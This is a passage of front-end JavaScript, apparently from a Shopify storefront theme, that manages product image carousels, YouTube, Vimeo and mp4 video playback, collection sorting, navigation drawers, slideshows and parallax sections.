                    var type = $(this).data('video-type');

                    if (videoTypes.indexOf(type) < 0) {
                        videoTypes.push(type);
                    }
                });

                // Load YouTube API if not already loaded
                if (videoTypes.indexOf('youtube') > -1) {
                    if (!theme.config.youTubeReady) {
                        window.loadYouTube();
                        $('body').on('youTubeReady' + this.settings.namespace, function() {
                            this.loadYoutubeVideos($productVideos);
                        }.bind(this));
                    } else {
                        this.loadYoutubeVideos($productVideos);
                    }
                }

                // Load Vimeo API if not already loaded
                if (videoTypes.indexOf('vimeo') > -1) {
                    if (!vimeoReady) {
                        window.loadVimeo();
                        $('body').on('vimeoReady' + this.settings.namespace, function() {
                            this.loadVimeoVideos($productVideos);
                        }.bind(this))
                    } else {
                        this.loadVimeoVideos($productVideos);
                    }
                }

                // Add mp4 video players
                if (videoTypes.indexOf('mp4') > -1) {
                    this.loadMp4Videos($productVideos);
                }

                return videoTypes;
            },

            loadMp4Videos: function($videos) {
                $videos.each(function() {
                    var $el = $(this);
                    if ($el.data('video-type') != 'mp4') {
                        return;
                    }

                    var id = $el.attr('id');
                    var videoId = $el.data('video-id');

                    videos[this.id] = {
                        type: 'mp4',
                        divId: id,
                        style: $el.data('video-style')
                    };
                });
            },

            loadVimeoVideos: function($videos) {
                $videos.each(function() {
                    var $el = $(this);
                    if ($el.data('video-type') != 'vimeo') {
                        return;
                    }

                    var id = $el.attr('id');
                    var videoId = $el.data('video-id');

                    videos[this.id] = {
                        type: 'vimeo',
                        divId: id,
                        id: videoId,
                        style: $el.data('video-style'),
                        width: $el.data('video-width'),
                        height: $el.data('video-height')
                    };
                });

                // Create a new player for each Vimeo video
                for (var key in videos) {
                    if (videos[key].type != 'vimeo') {
                        continue;
                    }

                    var args = $.extend({}, vimeoVideoOptions, videos[key]);
                    vimeoPlayers[key] = new Vimeo.Player(videos[key].divId, args);
                }

                vimeoReady = true;
            },

            autoplayVimeoVideo: function(id) {
                // Do not autoplay on mobile though
                if (!theme.config.bpSmall) {
                    this.requestToPlayVimeoVideo(id);
                } else {
                    // Set as loaded on mobile so you can see the image
                    var $player = $('#' + id);
                    setParentAsLoaded($player);
                }
            },

            requestToPlayVimeoVideo: function(id) {
                // The slider may initialize and attempt to play the video before
                // the API is even ready, because it sucks.

                var $player = $('#' + id);
                setParentAsLoading($player);

                if (!vimeoReady) {
                    // Wait for the trigger, then play it
                    $('body').on('vimeoReady' + this.settings.namespace, function() {
                        this.playVimeoVideo(id);
                    }.bind(this))
                    return;
                }

                this.playVimeoVideo(id);
            },

            playVimeoVideo: function(id) {
                vimeoPlayers[id].play();

                if (videos[id].style === 'muted') {
                    vimeoPlayers[id].setVolume(0);
                }

                var $player = $('#' + id);
                setParentAsLoaded($player);
            },

            stopVimeoVideo: function(id) {
                if (!theme.config.vimeoReady) {
                    return;
                }

                if (id) {
                    vimeoPlayers[id].pause();
                } else {
                    for (key in vimeoPlayers) {
                        if (typeof vimeoPlayers[key].pause === 'function') {
                            vimeoPlayers[key].pause();
                        }
                    }
                }
            },

            loadYoutubeVideos: function($videos) {
                $videos.each(function() {
                    var $el = $(this);
                    if ($el.data('video-type') != 'youtube') {
                        return;
                    }

                    var id = $el.attr('id');
                    var videoId = $el.data('youtube-id');

                    videos[this.id] = {
                        type: 'youtube',
                        id: id,
                        videoId: videoId,
                        style: $el.data('video-style'),
                        width: $el.data('video-width'),
                        height: $el.data('video-height'),
                        attemptedToPlay: false
                    };
                });

                // Create a player for each YouTube video
                for (var key in videos) {
                    if (videos[key].type === 'youtube') {
                        if (videos.hasOwnProperty(key)) {
                            var args = $.extend({}, youtubeVideoOptions, videos[key]);

                            if (args.style === 'muted') {
                                // default youtubeVideoOptions, no need to change anything
                                args.playerVars.controls = 1;
                            } else {
                                args.playerVars.controls = 1;
                                args.playerVars.autoplay = 0;
                            }

                            youtubePlayers[key] = new YT.Player(key, args);
                        }
                    }
                }

                youtubeReady = true;
            },

            requestToPlayYoutubeVideo: function(id, forcePlay) {
                if (!theme.config.youTubeReady) {
                    return;
                }

                var $player = $('#' + id);
                setParentAsLoading($player);

                // If video is requested too soon, player might not be ready.
                // Set arbitrary timeout to request it again in a second
                if (typeof youtubePlayers[id].playVideo != 'function') {
                    var o = this;
                    setTimeout(function() {
                        o.playYoutubeVideo(id, forcePlay);
                    }, 1000);
                    return;
                }

                this.playYoutubeVideo(id, forcePlay);
            },

            playYoutubeVideo: function (id, forcePlay) {
                var $player = $('#' + id);
                setParentAsLoaded($player);
                if (typeof youtubePlayers[id].playVideo === 'function') {
                    youtubePlayers[id].playVideo();
                }

                // forcePlay is sent as true from beforeSlideChange so the visibility
                // check isn't fooled by the next slide positioning
                if (!forcePlay) {
                    initCheckVisibility(id);
                }
            },

            stopYoutubeVideo: function(id) {
                if (!theme.config.youTubeReady) {
                    return;
                }

                if (id && youtubePlayers[id]) {
                    if (typeof youtubePlayers[id].pauseVideo === 'function') {
                        youtubePlayers[id].pauseVideo();
                    }
                    $(window).off('scroll.' + id);
                } else {
                    for (key in youtubePlayers) {
                        if (typeof youtubePlayers[key].pauseVideo === 'function') {
                            youtubePlayers[key].pauseVideo();
                            $(window).off('scroll.' + key);
                        }
                    }
                }
            },

            playMp4Video: function(id) {
                var $player = $('#' + id);
                setParentAsLoaded($player);

                $player[0].play();
            },

            stopMp4Video: function(id) {
                if (id) {
                    $('#' + id)[0].pause();
                } else {
                    // loop through all mp4 videos to stop them
                    for (var key in videos) {
                        if (videos[key].type === 'mp4') {
                            var player = $('#' + videos[key].divId)[0];
                            if (typeof player.pause === 'function') {
                                player.pause();
                            }
                        }
                    }
                }
            },

            // Init zoom for each image in the main carousel
            initZoom: function($image) {
                var largeImage = $image.parent().data('zoom-size');
                $image.parent()
                    .on('click', function(evt) {
                        evt.preventDefault();
                    })
                    .zoom({
                        on: 'click',
                        url: largeImage,
                        duration: 180,
                        touch: false,
                        onZoomIn: function() {
                            $(this).addClass('photo-zoom-linked');
                        },
                        onZoomOut: function() {
                            $(this).removeClass('photo-zoom-linked');
                        }
                    });
            },

            createImageCarousels: function() {
                // Init zoom since the carousel won't do it
                if (this.settings.zoom) {
                    this.initZoom($(this.selectors.productImageMain).find(selectors.zoomImage));
                }

                if (!this.$thumbSlider.length || $(this.selectors.photoThumbs).length < 2) {
                    // Single product image. Init video if it exists
                    var $video = $(this.selectors.productImageMain).find(selectors.productVideo);
                    if ($video.length) {
                        this.initVideo($video);
                    }
                    return;
                }

                this.settings.hasMultipleImages = true;

                // Set starting slide (for both sliders)
                var $activeSlide = this.$mainSlider.find('.starting-slide');
                var startIndex = this._slideIndex($activeSlide);

                // Lame way to prevent duplicate event listeners
                this.$mainSlider.off('init');
                this.$mainSlider.off('beforeChange');
                this.$mainSlider.on('init', this.mainSlideInit.bind(this));
                this.$mainSlider.on('beforeChange', this.beforeSlideChange.bind(this));

                // Default (mobile) slider settings
                this.mainSliderArgs = {
                    infinite: true,
                    arrows: false,
                    dots: true,
                    adaptiveHeight: true,
                    initialSlide: startIndex
                };

                this.thumbSliderArgs = {
                    initialSlide: startIndex
                };

                // Init sliders normally
                var sliderArgs = this.setSliderArgs();
                this.initSliders(sliderArgs);

                // Re-init slider when a breakpoint is hit
                $('body').on('matchSmall matchLarge', function() {
                    var sliderArgs = this.setSliderArgs();
                    this.initSliders(sliderArgs);
                }.bind(this));

                // Too many thumbnails can cause the AOS calculations to be off
                // so refresh that when the slider is ready
                if (AOS) {
                    AOS.refresh();
                }
            },

            initSliders: function(args) {
                this.destroyImageCarousels();

                this.$mainSlider.slick(args.main);
                if (!theme.config.bpSmall) {
                    this.$thumbSlider.slick(args.thumbs);
                    this.settings.slickThumbInitialized = true;
                }

                this.settings.slickMainInitialized = true;
            },

            setSliderArgs: function() {
                var args = {};
                var thumbnailsVertical = this.$thumbSlider.data('position') === 'beside' ? true : false;

                if (theme.config.bpSmall) {
                    args.main = this.mainSliderArgs;
                    args.thumbs = this.thumbSliderArgs;
                } else {
                    args.main = $.extend({}, this.mainSliderArgs, {
                        asNavFor: this.selectors.thumbSlider,
                        adaptiveHeight: thumbnailsVertical ? false : true,
                        dots: false,
                        infinite: false,
                        fade: true
                    });
                    args.thumbs = $.extend({}, this.thumbSliderArgs, {
                        asNavFor: this.selectors.mainSlider,
                        slidesToShow: thumbnailsVertical ? 3 : 5,
                        slidesToScroll: 1,
                        arrows: false,
                        dots: false,
                        vertical: thumbnailsVertical,
                        verticalSwiping: thumbnailsVertical,
                        focusOnSelect: true,
                        infinite: false,
                        customHeightMatching: thumbnailsVertical,
                        customSlideAdvancement: true
                    });
                }

                return args;
            },

            destroyImageCarousels: function() {
                if (this.$mainSlider && this.settings.slickMainInitialized) {
                    this.$mainSlider.slick('unslick');
                    this.settings.slickMainInitialized = false;
                }

                if (this.$thumbSlider && this.settings.slickThumbInitialized) {
                    this.$thumbSlider.slick('unslick');
                    this.settings.slickThumbInitialized = false;
                }
            },

            mainSlideInit: function(event, slick) {
                var $slider = slick.$slider;
                var $currentSlide = $slider.find(selectors.currentSlide);
                var $video = $currentSlide.find(selectors.productVideo);

                if (!$video.length) {
                    return;
                }

                this.initVideo($video);
            },

            initVideo: function($video) {
                var videoType = $video.data('video-type');
                var divId = $video.attr('id');

                if (videoType === 'mp4' && videos[divId].style === 'muted') {
                    this.playMp4Video(divId);
                }

                if (videoType === 'youtube') {
                    if (youtubeReady && videos[divId].style === 'muted') {
                        this.requestToPlayYoutubeVideo(divId);
                    }
                }

                if (videoType === 'vimeo') {
                    if (vimeoReady) {
                        this.playOrShowVimeo(divId);
                    } else {
                        $('body').on('vimeoReady' + this.settings.namespace, function() {
                            this.playOrShowVimeo(divId);
                        }.bind(this))
                    }
                }

                // Hacky way to trigger resetting the slider layout in modals
                if (this.inModal) {
                    this.resizeSlides();
                }
            },

            playOrShowVimeo: function(id) {
                if (videos[id] && videos[id].style === 'muted') {
                    this.autoplayVimeoVideo(id);
                } else if (videos[id] && videos[id].style === 'unmuted') {
                    setParentAsLoaded($('#' + id));
                }
            },

            getVideoType: function($video) {
                return $video.data('video-type');
            },

            getVideoId: function($video) {
                return $video.attr('id');
            },

            beforeSlideChange: function(event, slick, currentSlide, nextSlide) {
                var $slider = slick.$slider;
                var $currentSlide = $slider.find(selectors.currentSlide);
                var $prevVideo = $currentSlide.find('.product__video');
                var $nextSlide = $slider.find('.slick-slide[data-slick-index="' + nextSlide + '"]');
                var $nextVideo = $nextSlide.find('.product__video');

                // Pause any existing slide video
                if (currentSlide !== nextSlide && $prevVideo.length) {
                    var prevVideoType = this.getVideoType($prevVideo);
                    var prevVideoId = this.getVideoId($prevVideo);

                    if (prevVideoId) {
                        if (prevVideoType === 'youtube') {
                            this.stopYoutubeVideo(prevVideoId);
                        }

                        if (prevVideoType === 'mp4') {
                            this.stopMp4Video(prevVideoId);
                        }

                        if (prevVideoType === 'vimeo') {
                            this.stopVimeoVideo(prevVideoId);
                        }
                    }
                }

                // Prep next slide video
                if ($nextVideo.length) {
                    var nextVideoType = this.getVideoType($nextVideo);
                    var nextVideoId = this.getVideoId($nextVideo);

                    // Prep Vimeo with a backup in case the API isn't ready
                    if (nextVideoId && nextVideoType === 'vimeo') {
                        if (vimeoReady) {
                            if (videos[nextVideoId] && videos[nextVideoId].style === 'muted') {
                                this.autoplayVimeoVideo(nextVideoId);
                            }
                        } else {
                            $('body').on('vimeoReady' + this.settings.namespace, function() {
                                if (videos[nextVideoId] && videos[nextVideoId].style === 'muted') {
                                    this.autoplayVimeoVideo(nextVideoId);
                                }
                            }.bind(this))
                        }
                    }

                    // Prep YouTube with a backup in case API isn't ready
                    if (nextVideoId && nextVideoType === 'youtube') {
                        if (youtubeReady) {
                            if (videos[nextVideoId] && videos[nextVideoId].style === 'muted') {
                                this.requestToPlayYoutubeVideo(nextVideoId, true);
                            }
                        } else {
                            $('body').on('youTubeReady' + this.settings.namespace, function() {
                                if (videos[nextVideoId] && videos[nextVideoId].style === 'muted') {
                                    this.requestToPlayYoutubeVideo(nextVideoId, true);
                                }
                            }.bind(this))
                        }
                    }

                    // Autoplay muted MP4 videos
                    if (nextVideoId && videos[nextVideoId] && videos[nextVideoId].style === 'muted') {
                        if (nextVideoType === 'mp4') {
                            this.playMp4Video(nextVideoId);
                        }
                    }

                    // Set unmuted videos to loaded state
                    if (nextVideoId && videos[nextVideoId] && videos[nextVideoId].style != 'muted') {
                        setParentAsLoaded($('#' + nextVideoId));
                    }
                }

                // Layload zoom image
                if (this.settings.zoom) {
                    if ($nextSlide.hasClass(classes.zoomInit)) {
                        return;
                    }
                    var $image = $nextSlide.addClass(classes.zoomInit).find('img').addClass('lazyload');
                    this.initZoom($image);
                }
            },

            resizeSlides: function() {
                if (!this.settings.hasMultipleImages) {
                    return;
                }

                $(window).trigger('resize');
                setTimeout(function() {
                    this.$mainSlider.slick('setPosition');
                    this.$thumbSlider.slick('setPosition');
                }.bind(this), 500); // same timing as modal open transition
            },

            _slideIndex: function($el) {
                return $el.data('index');
            },

            // Ajax cart and qty
            initQtySelector: function() {
                this.$container.find('.js-qty').each(function() {
                    new theme.QtySelector($(this), {
                        namespace: '.product'
                    });
                });
            },

            initAjaxProductForm: function() {
                if (theme.settings.cartType === 'drawer') {
                    new theme.AjaxProduct($(this.selectors.formContainer));
                }
            },

            openModalProduct: function() {
                if (!this.settings.modalInit) {
                    var $formHolder = $(this.selectors.modalFormHolder);
                    var url = $formHolder.data('url');

                    $formHolder.load(url + ' #AddToCartForm-' + this.sectionId, function() {
                        $formHolder.addClass('is-active');
                        this.formSetup();
                        if (Shopify.PaymentButton) {
                            Shopify.PaymentButton.init();
                        }
                    }.bind(this));

                    this.productSetup();
                    this.loadModalContent();
                    this.createImageCarousels();
                    this.settings.modalInit = true;
                }

                this.resizeSlides();

                // Add product id to recently viewed array
                this.addIdToRecentlyViewed();
            },

            closeModalProduct: function() {
                this.stopYoutubeVideo();
                this.stopVimeoVideo();
                this.stopMp4Video();
            },

            loadModalContent: function() {
                // Load videos if they exist
                var videoTypes = this.checkIfVideos();

                // Lazyload mp4 videos similar to images
                if (videoTypes && videoTypes.indexOf('mp4') > -1) {
                    this.$modal.find('.product__video[data-video-type="mp4"]').each(function(i, video) {
                        var $el = $(video);
                        var src = $el.data('video-src');
                        var source = document.createElement('source');
                        source.setAttribute('src', src);
                        $el.append(source);
                    }.bind(this));
                }
            },

            onUnload: function() {
                this.$container.off(this.settings.namespace);
                $('body').off(this.settings.namespace);
                this.destroyImageCarousels();
            }
        });

        return Product;
    })();

    theme.CollectionHeader = (function() {

        var selectors = {
            hero: '.collection-hero',
            parallaxContainer: '.parallax-container'
        };

        function CollectionHeader(container) {
            var $container = $(container);
            this.namespace = '.collection-header';

            var $heroImageContainer = $container.find(selectors.hero);
            if ($heroImageContainer.length) {
                if ($container.data('parallax')) {
                    var $parallaxContainer = $container.find(selectors.parallaxContainer);
                    var args = {
                        namespace: this.namespace
                    };
                    theme.parallaxSections[this.namespace] = new theme.Parallax($parallaxContainer, args);
                }
            }
        }

        CollectionHeader.prototype = $.extend({}, CollectionHeader.prototype, {
            onUnload: function() {
                theme.parallaxSections[this.namespace].destroy();
                delete theme.parallaxSections[this.namespace];
            }
        });

        return CollectionHeader;
    })();

    theme.CollectionSidebar = (function() {
        var drawerStyle = false;

        function CollectionSidebar(container) {
            this.$container = $(container);
            this.init();
        }

        CollectionSidebar.prototype = $.extend({}, CollectionSidebar.prototype, {
            init: function() {
                // Force close the drawer if it exists
                this.onUnload();

                drawerStyle = this.$container.data('style') === 'drawer';
                theme.FilterDrawer = new theme.Drawers('FilterDrawer', 'collection-filters', true);
            },

            forceReload: function() {
                this.init();
            },

            onSelect: function() {
                if (theme.FilterDrawer) {
                    if (!drawerStyle) {
                        theme.FilterDrawer.close();
                        return;
                    }

                    if (drawerStyle || theme.config.bpSmall) {
                        theme.FilterDrawer.open();
                    }
                }
            },

            onDeselect: function() {
                if (theme.FilterDrawer) {
                    theme.FilterDrawer.close();
                }
            },

            onUnload: function() {
                if (theme.FilterDrawer) {
                    theme.FilterDrawer.close();
                }
            }
        });

        return CollectionSidebar;
    })();

    theme.Collection = (function() {

        var selectors = {
            colorSwatchImage: '.grid-product__color-image',
            colorSwatch: '.color-swatch--with-image'
        };

        function Collection(container) {
            this.container = container;
            this.sectionId = $(container).attr('data-section-id');
            this.namespace = '.collection-' + this.sectionId;

            this.init();
        }

        Collection.prototype = $.extend({}, Collection.prototype, {
            init: function() {
                // init is called on load and when tags are selected
                this.$container = $(this.container);
                var sectionId = this.sectionId = this.$container.attr('data-section-id');
                this.namespace = '.collection-' + sectionId;

                this.sortBy();
                this.colorSwatchHovering();

                theme.reinitSection('collection-sidebar');
            },

            sortBy: function() {
                var $sortBy = $('#SortBy');

                if (!$sortBy.length) {
                    return;
                }

                $sortBy.on('change' + this.namespace, function() {
                    location.href = '?sort_by=' + $(this).val();
                });
            },

            colorSwatchHovering: function() {
                var $colorImage = $(selectors.colorSwatchImage);
                if (!$colorImage.length) {
                    return;
                }

                var $swatches = this.$container.find(selectors.colorSwatch);

                $swatches.on({
                    mouseenter: function (evt) {
                        $el = $(evt.currentTarget);
                        var id = $el.data('variant-id');
                        var image = $el.data('variant-image');
                        $('.grid-product__color-image--' + id)
                            .css('background-image', 'url(' + image + ')')
                            .addClass('is-active');
                    },
                    mouseleave: function (evt) {
                        $el = $(evt.currentTarget);
                        var id = $el.data('variant-id');
                        $('.grid-product__color-image--' + id).removeClass('is-active');
                    }
                });
            },

            forceReload: function() {
                this.onUnload();
                this.init();
            },

            onUnload: function() {
                $(window).off(this.namespace);
                this.$container.off(this.namespace);
                $(selectors.colorSwatch).off(this.namespace);
            }
        });

        return Collection;
    })();

    theme.HeaderSection = (function() {

        var selectors = {
            drawer: '#NavDrawer',
            mobileSubNavToggle: '.mobile-nav__toggle-btn',
            hasSublist: '.mobile-nav__has-sublist'
        };

        var classes = {
            navExpanded: 'mobile-nav--expanded'
        };

        function Header(container) {
            var $container = this.$container = $(container);
            var sectionId = this.sectionId = $container.attr('data-section-id');

            // Reload any slideshow if when the header is reloaded to make sure the
            // sticky header works as expected
            theme.reinitSection('slideshow-section');

            theme.currencySwitcher.init()
            this.initDrawers();
            theme.headerNav.init();
            theme.announcementBar.init();

            // Set a timer to resize the header in case the logo changes size
            if (Shopify.designMode) {
                setTimeout(function() {
                    $('body').trigger('resize');
                }, 500);
            }
        }

        Header.prototype = $.extend({}, Header.prototype, {
            initDrawers: function() {
                theme.NavDrawer = new theme.Drawers('NavDrawer', 'nav');
                if (theme.settings.cartType === 'drawer') {
                    new theme.CartDrawer();
                }

                this.drawerMenuButtons();
            },

            drawerMenuButtons: function() {
                $(selectors.drawer).find('.js-drawer-close').on('click', function(evt){
                    evt.preventDefault();
                    theme.NavDrawer.close();
                });

                var $mobileSubNavToggle = $(selectors.mobileSubNavToggle);

                $mobileSubNavToggle.attr('aria-expanded', 'false');
                $mobileSubNavToggle.each(function (i, el) {
                    var $el = $(el);
                    $el.attr('aria-controls', $el.attr('data-aria-controls'));
                });

                $mobileSubNavToggle.on('click', function() {
                    var $el = $(this);
                    var currentlyExpanded = $el.attr('aria-expanded');
                    var toggleState = false;

                    // Updated aria-expanded value based on state pre-click
                    if (currentlyExpanded === 'true') {
                        $el.attr('aria-expanded', 'false');
                    } else {
                        $el.attr('aria-expanded', 'true');
                        toggleState = true;
                    }

                    // Toggle class that expands/collapses sublist
                    $el.closest(selectors.hasSublist).toggleClass(classes.navExpanded, toggleState);
                });
            },

            onBlockSelect: function(evt) {
                theme.announcementBar.onBlockSelect(evt.detail.blockId);
            },

            onDeselect: function() {
                theme.announcementBar.onBlockDeselect();
            },

            onUnload: function() {
                theme.NavDrawer.close();
                theme.headerNav.unload();
                theme.announcementBar.unload();
            }
        });

        return Header;

    })();

    theme.FeaturedContentSection = (function() {

        function FeaturedContent() {
            $('.rte').find('a:not(:has(img))').addClass('text-link');
        }

        return FeaturedContent;
    })();

    theme.slideshows = {};

    theme.SlideshowSection = (function() {

        var selectors = {
            parallaxContainer: '.parallax-container'
        };

        function SlideshowSection(container) {
            var $container = this.$container = $(container);
            var $section = $container.parent();
            var sectionId = $container.attr('data-section-id');
            var slideshow = this.slideshow = '#Slideshow-' + sectionId;
            this.namespace = '.' + sectionId;

            var $imageContainer = $(container).find('.hero');
            if ($imageContainer.length) {
                theme.loadImageSection($imageContainer);
            }

            this.init();

            if ($container.data('parallax')) {
                var args = {
                    namespace: this.namespace
                };
                theme.parallaxSections[this.namespace] = new theme.Parallax($container.find(selectors.parallaxContainer), args);
            }
        }

        SlideshowSection.prototype = $.extend({}, SlideshowSection.prototype, {
            init: function() {
                // Prevent slideshows from initializing on top of themselves
                this.onUnload();

                var $slideshow = $(this.slideshow);
                var args = {
                    autoplay: $slideshow.data('autoplay'),
                    arrows: $slideshow.data('arrows'),
                    dots: $slideshow.data('dots'),
                    fade: true,
                    speed: 500 // same as $slideshowImageAnimationSpeed in CSS
                };

                theme.slideshows[this.slideshow] = new theme.Slideshow(this.slideshow, args);
            },

            forceReload: function() {
                this.init();
            },

            onUnload: function() {
                if (theme.parallaxSections[this.namespace]) {
                    theme.parallaxSections[this.namespace].destroy();
                    delete theme.parallaxSections[this.namespace];
                }
                if (theme.slideshows[this.slideshow]) {
                    theme.slideshows[this.slideshow].destroy();
                    delete theme.slideshows[this.slideshow];
                }
            },

            onSelect: function() {
                $(this.slideshow).slick('slickPause');
            },

            onDeselect: function() {
                $(this.slideshow).slick('slickPlay');
            },

            onBlockSelect: function(evt) {
                var $slideshow = $(this.slideshow);

                // Ignore the cloned version
                var $slide = $('.slideshow__slide--' + evt.detail.blockId + ':not(.slick-cloned)');
                var slideIndex = $slide.data('slick-index');

                // Go to selected slide, pause autoplay
                $slideshow.slick('slickGoTo', slideIndex).slick('slickPause');
            },

            onBlockDeselect: function() {
                $(this.slideshow).slick('slickPlay');
            }
        });

        return SlideshowSection;
    })();

    theme.VideoSection = (function() {
        var youtubeReady;
        var videos = [];
        var youtubePlayers = [];
        var youtubeVideoOptions = {
            width: 1280,
            height: 720,
            playerVars: {
                autohide: 0,
                branding: 0,
                cc_load_policy: 0,
                controls: 0,
                fs: 0,
                iv_load_policy: 3,
                modestbranding: 1,
                playsinline: 1,
                quality: 'hd720',
                rel: 0,
                showinfo: 0,
                wmode: 'opaque'
            },
            events: {
                onReady: onVideoPlayerReady,
                onStateChange: onVideoStateChange
            }
        };

        var vimeoReady = false;
        var vimeoVideoOptions = {
            byline: false,
            title: false,
            portrait: false,
            loop: true
        };

        var selectors = {
            videoParent: '.video-parent-section'
        };

        var classes = {
            loading: 'loading',
            loaded: 'loaded',
            interactable: 'video-interactable'
        };

        function videoSection(container) {
            var $container = this.$container = $(container);
            var sectionId = this.sectionId = $container.attr('data-section-id');
            var youtubePlayerId = this.youtubePlayerId = 'YouTubeVideo-' + this.sectionId;
            this.namespace = '.' + youtubePlayerId;
            var vimeoPlayerId = this.vimeoPlayerId = 'Vimeo-' + this.sectionId;
            var $vimeoTrigger = this.$vimeoTrigger = $('#VimeoTrigger-' + this.sectionId);
            var mp4Video = 'Mp4Video-' + this.sectionId;

            var $youtubeDiv = $('#' + youtubePlayerId);
            var $vimeoDiv = $('#' + vimeoPlayerId);
            var $mp4Div = $('#' + mp4Video);

            this.vimeoPlayer = [];

            if ($youtubeDiv.length) {
                this.youtubeVideoId = $youtubeDiv.data('video-id');
                this.initYoutubeVideo();
            }

            if ($vimeoDiv.length) {
                this.vimeoVideoId = $vimeoDiv.data('video-id');
                this.initVimeoVideo();
            }

            if ($mp4Div.length) {
                setParentAsLoaded($mp4Div);

                startMp4Playback(mp4Video).then(function() {
                    // Video played as expected, don't do anything
                }).catch(function(error) {
                    // Video cannot be played with autoplay, so let
                    // user interact with video element itself
                    setVideoToBeInteractedWith($mp4Div);
                })
            }
        }

        function startMp4Playback(mp4Video) {
            return document.querySelector('#' + mp4Video).play();
        }

        function onVideoPlayerReady(evt) {
            var $player = evt.target.h ? $(evt.target.h) : $(evt.target.h);
          
          	// FIX BY SM
          
          	var videoId = evt.target.getVideoData().video_id;
            var $player = $('[data-video-id="'+videoId+'"]');
            if (!$player.length) { $player = $('[data-youtube-id="'+videoId+'"]') }
          
          	// END FIX BY SM
          	
            var playerId = $player.attr('id');
            youtubePlayers[playerId] = evt.target; // update stored player
            var player = youtubePlayers[playerId];

            setParentAsLoading($player);

            youtubePlayers[playerId].mute();

            // Remove from tabindex because YouTube iframes are annoying and you can focus
            // on the YouTube logo and it breaks
            $player.attr('tabindex', '-1');

            // Add out of view pausing
            videoVisibilityCheck(playerId);
            $(window).on('scroll.' + playerId, {id: playerId}, $.throttle(150, videoVisibilityCheck));
        }

        function videoVisibilityCheck(id) {
            var playerId;

            if (typeof id === 'string') {
                playerId = id;
            } else {
                // Data comes in as part of the scroll event
                playerId = id.data ? id.data.id : false;
            }

            if (playerId) {
                if (theme.isElementVisible($('#' + playerId))) {
                    playVisibleVideo(playerId);
                } else {
                    pauseHiddenVideo(playerId);
                }
            }
        }

        function playVisibleVideo(id) {
            if (youtubePlayers[id] && typeof youtubePlayers[id].playVideo === 'function') {
                youtubePlayers[id].playVideo();
            }
        }

        function pauseHiddenVideo(id) {
            if (youtubePlayers[id] && typeof youtubePlayers[id].pauseVideo === 'function') {
                youtubePlayers[id].pauseVideo();
            }
        }

        function onVideoStateChange(evt) {
            var $player = evt.target.h ? $(evt.target.h) : $(evt.target.h);
          
          	// FIX BY SM
          
          	var videoId = evt.target.getVideoData().video_id;
            var $player = $('[data-video-id="'+videoId+'"]');
            if (!$player.length) { $player = $('[data-youtube-id="'+videoId+'"]') }
          
          	// END FIX BY SM
          
            var playerId = $player.attr('id');
            var player = youtubePlayers[playerId];

            switch (evt.data) {
                case -1: // unstarted
                    // Handle low power state on iOS by checking if
                    // video is reset to unplayed after attempting to buffer
                    if (videos[playerId].attemptedToPlay) {
                        setParentAsLoaded($player);
                        setVideoToBeInteractedWith($player);
                    }
                    break;
                case 0: // ended
                    player.playVideo();
                    break;
                case 1: // playing
                    setParentAsLoaded($player);
                    break;
                case 3: // buffering
                    videos[playerId].attemptedToPlay = true;
                    break;
            }
        }

        function setParentAsLoading($el) {
            $el
                .closest(selectors.videoParent)
                .addClass(classes.loading);
        }

        function setParentAsLoaded($el) {
            $el
                .closest(selectors.videoParent)
                .removeClass(classes.loading)
                .addClass(classes.loaded);
        }

        function setVideoToBeInteractedWith($el) {
            $el
                .closest(selectors.videoParent)
                .addClass(classes.interactable);
        }

        videoSection.prototype = $.extend({}, videoSection.prototype, {
            initYoutubeVideo: function() {
                videos[this.youtubePlayerId] = {
                    id: this.youtubePlayerId,
                    videoId: this.youtubeVideoId,
                    type: 'youtube',
                    attemptedToPlay: false
                };

                if (!youtubeReady) {
                    window.loadYouTube();
                    $('body').on('youTubeReady' + this.namespace, this.loadYoutubeVideo.bind(this));
                } else {
                    this.loadYoutubeVideo();
                }
            },

            loadYoutubeVideo: function() {
                var args = $.extend({}, youtubeVideoOptions, videos[this.youtubePlayerId]);
                args.playerVars.controls = 1;
                youtubePlayers[this.youtubePlayerId] = new YT.Player(this.youtubePlayerId, args);

                youtubeReady = true;
            },

            initVimeoVideo: function() {
                videos[this.vimeoPlayerId] = {
                    divId: this.vimeoPlayerId,
                    id: this.vimeoVideoId,
                    type: 'vimeo'
                };

                var $player = $('#' + this.vimeoPlayerId);
                setParentAsLoading($player);

                // Button to play video on mobile
                this.$vimeoTrigger.on('click', + this.namespace, function(evt) {
                    // $(evt.currentTarget).addClass('hide');
                    this.requestToPlayVimeoVideo(this.vimeoPlayerId);
                }.bind(this));

                if (!vimeoReady) {
                    window.loadVimeo();
                    $('body').on('vimeoReady' + this.namespace, this.loadVimeoVideo.bind(this));
                } else {
                    this.loadVimeoVideo();
                }
            },

            loadVimeoVideo: function() {
                var args = $.extend({}, vimeoVideoOptions, videos[this.vimeoPlayerId]);
                this.vimeoPlayer[this.vimeoPlayerId] = new Vimeo.Player(videos[this.vimeoPlayerId].divId, args);

                vimeoReady = true;

                // Only autoplay on larger screens
                if (!theme.config.bpSmall) {
                    this.requestToPlayVimeoVideo(this.vimeoPlayerId);
                } else {
                    var $player = $('#' + this.vimeoPlayerId);
                    setParentAsLoaded($player);
                }
            },

            requestToPlayVimeoVideo: function(id) {
                // The slider may initialize and attempt to play the video before
                // the API is even ready, because it sucks.

                if (!vimeoReady) {
                    // Wait for the trigger, then play it
                    $('body').on('vimeoReady' + this.namespace, function() {
                        this.playVimeoVideo(id);
                    }.bind(this))
                    return;
                }

                this.playVimeoVideo(id);
            },

            playVimeoVideo: function(id) {
                this.vimeoPlayer[id].play();
                this.vimeoPlayer[id].setVolume(0);

                var $player = $('#' + id);
                setParentAsLoaded($player);
            },

            onUnload: function(evt) {
                var sectionId = evt.target.id.replace('shopify-section-', '');
                var playerId = 'YouTubeVideo-' + sectionId;
                youtubePlayers[playerId].destroy();
                $(window).off('scroll' + this.namespace);
                $('body').off('vimeoReady' + this.namespace);
            }
        });

        return videoSection;
    })();

    theme.BackgroundImage = (function() {

        var selectors = {
            parallaxContainer: '.parallax-container'
        };

        function backgroundImage(container) {
            var $container = $(container);
            var sectionId = $container.attr('data-section-id');
            this.namespace = '.' + sectionId;

            if (!$container.length) {
                return;
            }

            if ($container.data('parallax')) {
                var $parallaxContainer = $container.find(selectors.parallaxContainer);
                var args = {
                    namespace: this.namespace,
                    desktopOnly: true
                };

                theme.parallaxSections[this.namespace] = new theme.Parallax($parallaxContainer, args);
            }
        }

        backgroundImage.prototype = $.extend({}, backgroundImage.prototype, {
            onUnload: function(evt) {
                theme.parallaxSections[this.namespace].destroy();
                delete theme.parallaxSections[this.namespace];
            }
        });

